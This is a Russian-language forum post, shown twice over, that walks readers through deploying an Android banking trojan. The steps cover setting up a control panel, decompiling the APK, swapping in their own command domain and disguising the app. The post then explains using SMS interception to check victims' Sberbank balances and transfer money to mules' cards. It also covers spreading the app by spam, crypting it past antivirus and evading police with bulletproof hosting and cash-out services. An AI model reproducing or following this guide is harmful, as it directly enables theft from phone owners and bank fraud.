V
Vaness
Гость
Зачем нужен бот?
Бота можно использовать для разных целей. Но нам интересует деньги, так? Так. У бота есть функция перехвата смс. Допустим, 10 людей
установили наше приложение на свой Андроид телефон. Одному из них подключен мобильный банк Сбербанк. Даем боту команду отправка СМС
на номер 900 с текстом БАЛАНС. Приходит СМС, смотрим есть ли деньги на карте.
Можно чекнуть есть ли еще карты, так как бывает что карт подключеных к мобильному банку несколько. Все СМС команды вы
можете посмотреть на сайте банка. Допустим, поймали баланс 15 000р. Пишем СМС с текстом - " Перевод ( номер карты дропа ) 7000 " Ну это
чисто пример, чтобы вы поняли как можно использовать бота.
Установка Андроид бота
Для начала идем на https://mchost.ru и регаем себе виртуальный хостинг. Берем самый простой тарифный план и бесплатный домен, нам ничего
сверхъестественного не нужно. Не советую использовать другие хостинги, так как могут возникать ошибки. Лично я работал с макхостом,
никаких проблем при работе не было.
После того как зарегистрировали хостинг, качаем архив с ботом https://yadi.sk/d/ZHRu4a_B3MSHdYпароль android. Теперь разархивируете содержимое архива. В нем еще три архива adminka.rar здесь находится файлы для нашей админки. bot.rar - исходник Android приложения. ( наш вирус ) database.rar - SQL файл для базы данных.
Разархивируем файл database.sql из архива database.rar Заходим на хостинг, и создаем базу данных. Название базы пишите какое угодно,
пароль ставим надежный. НЕ ЗАБЫВАЕМ ПАРОЛЬ. Логин базы данных пишем такой же как и имя базы. После того как создали базу, заходим в
нашу базу, и жмем кнопку " Импорт " Откроется вот такое окно
Ничего больше не меняем, не трогаем, жмем " Вперед " внизу страницы.
На этом работа с БД закончена, выходим.
Далее нужно извлечь файлы из архива adminka.rar Это будет наша админка, панель управления зараженными Android устройствами.
Открываем папку private - тут нам нужен файл config.php Редактировать его можно с любым текстовым редактором. Я использую Notepad++
DB - сюда пишем имя базы.
USER - юзер базы. Совпадает с именем базы.
PASSWORD - пароль от базы данных. Зеленый текст не трогаем, это просто как пример, редактировать его не нужно. Сохраняем изменения, и
закрываем файл. Больше ничего редактировать не нужно.
Теперь нужно загрузить все файлы которые мы извлекали из архива adminka.rar на хостинг. Для этого берем все папки, все файлы ( вместе с
той в которой редактировали файл) и добавляем их в архив. Заходим на хостинг, и открываем " Файл менеджер " Откроется окно с папками,
открываем папку " httpdocs " и жмем " Закачать файл " Загружаем только созданный нами архив на хостинг.
После загрузки, жмем " Распаковать архив " Закрываем менеджер. Загружать можно и иначе, это без разницы,
смотрите сами как вам удобней, я описал самый простой вариант. После этих действий, можем заходить в админку. ( заходим на наш домен )
Если все правильно сделали, перед вами должна быть такая картина. Если таблички о успешном подключении к БД нет, идем назад на
config.php и исправляем ошибки. Все должно быть точно так же как на картинке
Теперь нужно собрать наше приложение, наш вирус. Опять же, пойдем самым простым путем. Есть много вариантов, мы возьмем самое
простое. Качаем программу Batch ApkTool - http://bursoft-portable.blogspot.com/p/blog-page_23.html
Попробуйте запустить BatchApkTool.exe
Если не работает, обновите Java, и все заработает.
Идем дальше. Открываем архив bot.rar - папка " app " и извлекаем файл " app-release.apk " Копируем его в BatchApkTool, папка " INPUT_APK "
Запускаем BatchApkTool.exe и декомпилируем наш АПК файл. ( жмем клавишу " 1 " и Enter )
После того как увидели надпись " ГОТОВО " зеленым текстом, можем закрывать программу.
Открываем папку " INPUT_APK " и там вы должны видеть папку с названием " app-release " Заходим в эту папку, и переходим - smali - com 3
example - livemusay - myapplication
В последней папке есть куча файлов. Нам нужно только 5 файлов
стоит админка. Если вы используйте Notepad++, то просто вбиваем в поиск по всем файлам текст " http:// " Поиск выдаст нам места где нужно
прописать наш домен.
файлы.
Теперь нам нужно изменить иконку и название приложения. Делаем через тот же BatchApkTool.
Переходим на BatchApkTool\_INPUT_APK\app-release\res\values
И в папке " values " находим файл " strings.xml"
Открывем его и редактируем.
Чтобы сменить иконку приложения, открываем папку " res "
Там есть папки
- mipmap-hdpi-v4
- mipmap-mdpi-v4
- mipmap-xhdpi-v4
- mipmap-xxhdpi-v4
- mipmap-xxxhdpi-v4
В этих папках находится наша иконка. Качаем любую иконку ( поиск в Google - Android icons )
И просто в этих папках заменяем старую иконку на нашу новую.
ВАЖНО - название иконики должно быть такое же как и у старой иконки. Если старая иконка " ic_launcher" значит и свою новую иконку вы должны
так же переименовать в " ic_launcher" Потом просто заменяем, и все.
Теперь можем рекомпилировать наш АПК. Он будет с нашей админкой, нашей иконкой, и с нашим названием. Для этого открываем
BatchApkTool.exe Жмем Рекомпилировать АПК ( клавиша " 3 " и потом Enter. )
Дожидаемся пока программа рекомпилирует АПК, и закрываем ее.
В папке " OUT_APK " лежит готовый АПК файл, настроен для работы. Кидаем его жертве и радуемся.
Если все правильно сделали, то в админке сразу после того как кто то наше приложение установит, будет видно телефон. Модель, OC и так
далее.
В админке с функциями я думаю разберетесь. Все просто, доступно, на русском. Для добавления команды, нужно поставить галочку на против
бота которому хотите дать команду, и нажать " Добавить команду " и там уже смотрите что хотите сделать с ботом. Отправить смс, USSD, запрос о
разрешении отправки и чтении. Разрешение на отправку и чтение смс нужно только начиная от 6 Андроид.
Это у всех ботов, с этим ничего не поделаешь.
По своему опыту могу сказать, что из 10 как минимум 6 дает нам нужное разрешение.
По поводу самого бота хочу сказать что это лишь демо версия ( руки не опускайте, я отлично сливал с этим ботом )
Функции бот выполняет в лучшем виде, проблем нет. Автор бота maza-in
Если у кого будет желание, можно купить полную версию бота у автора.
У всех первым делом возникнет вопрос - где же брать эти установки нашего вируса? Как его впарить жертве?
Тут все от вашей фантазии зависит, можно спамить, можно просто покупать эти установки у трафферов ( ищите по форумам, их достаточно )
Я сам гнал трафф из бирж. Ну это способ довольно сложный, и точно не бесплатный. Включаем фантазию и все будет ок.
Еще один важный нюанс - наш файл палится антивирусами и его нужно криптовать.
Проверить детект файла можно в этом сервисе - https://nodistribute.com/
VIRUSTOTAL МИМО!!!!!!!!!!! НИКОГДА НЕ ЧЕКАЙТЕ ТАМ ФАЙЛЫ!!!!!
Сам я начинал без денег, даже рубля не было, и первые банки получил от спама, и без крипта. Поэтому если у кого нет денег совсем, не
переживайте, можно все провернуть и без вложений. Но с мозгами.
Анонимность
Наверно всем будет интересно как работать чтобы вас не спалили. В первую очередь хочу сказать, что можно использовать VPN, SOCKS,
виртуалки, дедики - все равно, если нужно будет, вас найдут. Интернет анонимность это миф. Те кто хотят себя подстраховать, читаем дальше.
Допустим вам удалось слить деньги. Жертва звонит в банк, идет в полицию, пишет заявку. Допустим ( что вообще не реально ) менты
взялись за дело. Повторю, это не реально, и 99,9% что такого не будет. Как же они будут вас искать? Будут искать дропов, но тут я думаю все
понятно. Дроп вас даже в лицо не видел, кто вы и что, не знает. Поехали дальше.
Берут телефон жертвы, чекают на вирусы. Быстренько находят наше приложение, разберают его, и находят домен к которому мы
прикрутили наш АПК. У них уже есть наш домен, а дальше дело техники. Просто показывают нашему хостинг провайдеру наш домен, и провайдер
выдает наши логи. Получив логи, они уже обращаются к нашему интернет провайдеру.
Дальше по старинке, ОМОН выносит дверь, вас заберают, ну и начинаются посиделки на нарах. Что нам нужно для анонимности любой хостинг, но регать его с VPN, дед, SSH, виртуалка, SOCKS.
Тут сами смотрите, что по душе.
Лучше если все это вместе сразу. То есть только после того как подключили все нужные материалы анонимности, только
тогда заходим на сайт хостинга, и берем себе хост. Почту на которую будем регать хостинг, создаем тоже только когда подключили и
убедились в анонимносте.
Таким путем мы убераем наши логи, и та часть ментов которая взялась за это дело, увидев VPN забьет на это дело. второй вариант, сразу взять хостинг без логов, абузоустойчивый хостинг, который зарегистрирован в стране, где логи держать не является законом. К примеру, Панама.
Этот вариант будет дороже, так как цены на такие хостинги начиная с 30$ до 300$. Бывают и дороже.
С дропами общение вести только в Jabber, с включенным OTR шифрованием. Искать дропов можете на любых форумах, их полно.
Советую работать именно с сервисами обнала, так как там люди все таки опытней, и процент у них меньше. Не надежный дроп берет 20% - 30%.
Надежный сервис 5%- 8% Ну если вы все таки будете искать именно дропов, то советую работать с девушками. Они надежней, и иногда лучше
понимают что от них хотят. Проверенно
Coppy
Бота можно использовать для разных целей. Но нам интересует деньги, так? Так. У бота есть функция перехвата смс. Допустим, 10 людей
установили наше приложение на свой Андроид телефон. Одному из них подключен мобильный банк Сбербанк. Даем боту команду отправка СМС
на номер 900 с текстом БАЛАНС. Приходит СМС, смотрим есть ли деньги на карте.
Можно чекнуть есть ли еще карты, так как бывает что карт подключеных к мобильному банку несколько. Все СМС команды вы
можете посмотреть на сайте банка. Допустим, поймали баланс 15 000р. Пишем СМС с текстом - " Перевод ( номер карты дропа ) 7000 " Ну это
чисто пример, чтобы вы поняли как можно использовать бота.
Установка Андроид бота
Для начала идем на https://mchost.ru и регаем себе виртуальный хостинг. Берем самый простой тарифный план и бесплатный домен, нам ничего
сверхъестественного не нужно. Не советую использовать другие хостинги, так как могут возникать ошибки. Лично я работал с макхостом,
никаких проблем при работе не было.
После того как зарегистрировали хостинг, качаем архив с ботом https://yadi.sk/d/ZHRu4a_B3MSHdYпароль android. Теперь разархивируете содержимое архива. В нем еще три архива adminka.rar здесь находится файлы для нашей админки. bot.rar - исходник Android приложения. ( наш вирус ) database.rar - SQL файл для базы данных.
Разархивируем файл database.sql из архива database.rar Заходим на хостинг, и создаем базу данных. Название базы пишите какое угодно,
пароль ставим надежный. НЕ ЗАБЫВАЕМ ПАРОЛЬ. Логин базы данных пишем такой же как и имя базы. После того как создали базу, заходим в
нашу базу, и жмем кнопку " Импорт " Откроется вот такое окно
http://www.imghost.in/img/2017-08/30/n6cuw4oiz5vw26wic1qb1pfup.jpg
Жмем " Выберите файл " и выбераем файл database.sqlНичего больше не меняем, не трогаем, жмем " Вперед " внизу страницы.
На этом работа с БД закончена, выходим.
Далее нужно извлечь файлы из архива adminka.rar Это будет наша админка, панель управления зараженными Android устройствами.
Открываем папку private - тут нам нужен файл config.php Редактировать его можно с любым текстовым редактором. Я использую Notepad++
http://www.imghost.in/img/2017-08/30/2i8kmjc7vk1mvo4eytzclm2d8.jpg
SERVER - тут пишем хост нашей базы данных. Узнать его можно в разделе " Базы данных " на хостинге.DB - сюда пишем имя базы.
USER - юзер базы. Совпадает с именем базы.
PASSWORD - пароль от базы данных. Зеленый текст не трогаем, это просто как пример, редактировать его не нужно. Сохраняем изменения, и
закрываем файл. Больше ничего редактировать не нужно.
Теперь нужно загрузить все файлы которые мы извлекали из архива adminka.rar на хостинг. Для этого берем все папки, все файлы ( вместе с
той в которой редактировали файл) и добавляем их в архив. Заходим на хостинг, и открываем " Файл менеджер " Откроется окно с папками,
открываем папку " httpdocs " и жмем " Закачать файл " Загружаем только созданный нами архив на хостинг.
После загрузки, жмем " Распаковать архив " Закрываем менеджер. Загружать можно и иначе, это без разницы,
смотрите сами как вам удобней, я описал самый простой вариант. После этих действий, можем заходить в админку. ( заходим на наш домен )
Если все правильно сделали, перед вами должна быть такая картина. Если таблички о успешном подключении к БД нет, идем назад на
config.php и исправляем ошибки. Все должно быть точно так же как на картинке
http://www.imghost.in/img/2017-08/30/2fvp2ebupih2tj2dxtzw8f31k.jpg
Можно закрывать хостинг, админка настроена и готова для работы.Теперь нужно собрать наше приложение, наш вирус. Опять же, пойдем самым простым путем. Есть много вариантов, мы возьмем самое
простое. Качаем программу Batch ApkTool - http://bursoft-portable.blogspot.com/p/blog-page_23.html
Попробуйте запустить BatchApkTool.exe
Если не работает, обновите Java, и все заработает.
Идем дальше. Открываем архив bot.rar - папка " app " и извлекаем файл " app-release.apk " Копируем его в BatchApkTool, папка " INPUT_APK "
Запускаем BatchApkTool.exe и декомпилируем наш АПК файл. ( жмем клавишу " 1 " и Enter )
После того как увидели надпись " ГОТОВО " зеленым текстом, можем закрывать программу.
Открываем папку " INPUT_APK " и там вы должны видеть папку с названием " app-release " Заходим в эту папку, и переходим - smali - com 3
example - livemusay - myapplication
В последней папке есть куча файлов. Нам нужно только 5 файлов
- - delSoundSWS.smali
- - injectionActivity.smali
- - Press.smali
- - StartWhile.smali
- - b.smali
стоит админка. Если вы используйте Notepad++, то просто вбиваем в поиск по всем файлам текст " http:// " Поиск выдаст нам места где нужно
прописать наш домен.
http://www.imghost.in/img/2017-08/30/b9naytbsaxs2tzs5mgxfu0bl0.jpg
Меняем домен http://probaand.mcdir.ru на свой. После того как в КАЖДОМ файле прописали свой домен, сохраняем изменения, и закрываем всефайлы.
Теперь нам нужно изменить иконку и название приложения. Делаем через тот же BatchApkTool.
Переходим на BatchApkTool\_INPUT_APK\app-release\res\values
И в папке " values " находим файл " strings.xml"
Открывем его и редактируем.
http://www.imghost.in/img/2017-08/30/w21cohs08x04emf6v3v8yhnhn.jpg
Сохраняем изменения и закрываем.Чтобы сменить иконку приложения, открываем папку " res "
Там есть папки
- mipmap-hdpi-v4
- mipmap-mdpi-v4
- mipmap-xhdpi-v4
- mipmap-xxhdpi-v4
- mipmap-xxxhdpi-v4
В этих папках находится наша иконка. Качаем любую иконку ( поиск в Google - Android icons )
И просто в этих папках заменяем старую иконку на нашу новую.
ВАЖНО - название иконики должно быть такое же как и у старой иконки. Если старая иконка " ic_launcher" значит и свою новую иконку вы должны
так же переименовать в " ic_launcher" Потом просто заменяем, и все.
Теперь можем рекомпилировать наш АПК. Он будет с нашей админкой, нашей иконкой, и с нашим названием. Для этого открываем
BatchApkTool.exe Жмем Рекомпилировать АПК ( клавиша " 3 " и потом Enter. )
Дожидаемся пока программа рекомпилирует АПК, и закрываем ее.
В папке " OUT_APK " лежит готовый АПК файл, настроен для работы. Кидаем его жертве и радуемся.
Если все правильно сделали, то в админке сразу после того как кто то наше приложение установит, будет видно телефон. Модель, OC и так
далее.
В админке с функциями я думаю разберетесь. Все просто, доступно, на русском. Для добавления команды, нужно поставить галочку на против
бота которому хотите дать команду, и нажать " Добавить команду " и там уже смотрите что хотите сделать с ботом. Отправить смс, USSD, запрос о
разрешении отправки и чтении. Разрешение на отправку и чтение смс нужно только начиная от 6 Андроид.
Это у всех ботов, с этим ничего не поделаешь.
По своему опыту могу сказать, что из 10 как минимум 6 дает нам нужное разрешение.
По поводу самого бота хочу сказать что это лишь демо версия ( руки не опускайте, я отлично сливал с этим ботом )
Функции бот выполняет в лучшем виде, проблем нет. Автор бота maza-in
Если у кого будет желание, можно купить полную версию бота у автора.
У всех первым делом возникнет вопрос - где же брать эти установки нашего вируса? Как его впарить жертве?
Тут все от вашей фантазии зависит, можно спамить, можно просто покупать эти установки у трафферов ( ищите по форумам, их достаточно )
Я сам гнал трафф из бирж. Ну это способ довольно сложный, и точно не бесплатный. Включаем фантазию и все будет ок.
Еще один важный нюанс - наш файл палится антивирусами и его нужно криптовать.
Проверить детект файла можно в этом сервисе - https://nodistribute.com/
VIRUSTOTAL МИМО!!!!!!!!!!! НИКОГДА НЕ ЧЕКАЙТЕ ТАМ ФАЙЛЫ!!!!!
Сам я начинал без денег, даже рубля не было, и первые банки получил от спама, и без крипта. Поэтому если у кого нет денег совсем, не
переживайте, можно все провернуть и без вложений. Но с мозгами.
Анонимность
Наверно всем будет интересно как работать чтобы вас не спалили. В первую очередь хочу сказать, что можно использовать VPN, SOCKS,
виртуалки, дедики - все равно, если нужно будет, вас найдут. Интернет анонимность это миф. Те кто хотят себя подстраховать, читаем дальше.
Допустим вам удалось слить деньги. Жертва звонит в банк, идет в полицию, пишет заявку. Допустим ( что вообще не реально ) менты
взялись за дело. Повторю, это не реально, и 99,9% что такого не будет. Как же они будут вас искать? Будут искать дропов, но тут я думаю все
понятно. Дроп вас даже в лицо не видел, кто вы и что, не знает. Поехали дальше.
Берут телефон жертвы, чекают на вирусы. Быстренько находят наше приложение, разберают его, и находят домен к которому мы
прикрутили наш АПК. У них уже есть наш домен, а дальше дело техники. Просто показывают нашему хостинг провайдеру наш домен, и провайдер
выдает наши логи. Получив логи, они уже обращаются к нашему интернет провайдеру.
Дальше по старинке, ОМОН выносит дверь, вас заберают, ну и начинаются посиделки на нарах. Что нам нужно для анонимности любой хостинг, но регать его с VPN, дед, SSH, виртуалка, SOCKS.
Тут сами смотрите, что по душе.
Лучше если все это вместе сразу. То есть только после того как подключили все нужные материалы анонимности, только
тогда заходим на сайт хостинга, и берем себе хост. Почту на которую будем регать хостинг, создаем тоже только когда подключили и
убедились в анонимносте.
Таким путем мы убераем наши логи, и та часть ментов которая взялась за это дело, увидев VPN забьет на это дело. второй вариант, сразу взять хостинг без логов, абузоустойчивый хостинг, который зарегистрирован в стране, где логи держать не является законом. К примеру, Панама.
Этот вариант будет дороже, так как цены на такие хостинги начиная с 30$ до 300$. Бывают и дороже.
С дропами общение вести только в Jabber, с включенным OTR шифрованием. Искать дропов можете на любых форумах, их полно.
Советую работать именно с сервисами обнала, так как там люди все таки опытней, и процент у них меньше. Не надежный дроп берет 20% - 30%.
Надежный сервис 5%- 8% Ну если вы все таки будете искать именно дропов, то советую работать с девушками. Они надежней, и иногда лучше
понимают что от них хотят. Проверенно
Coppy
Последнее редактирование:
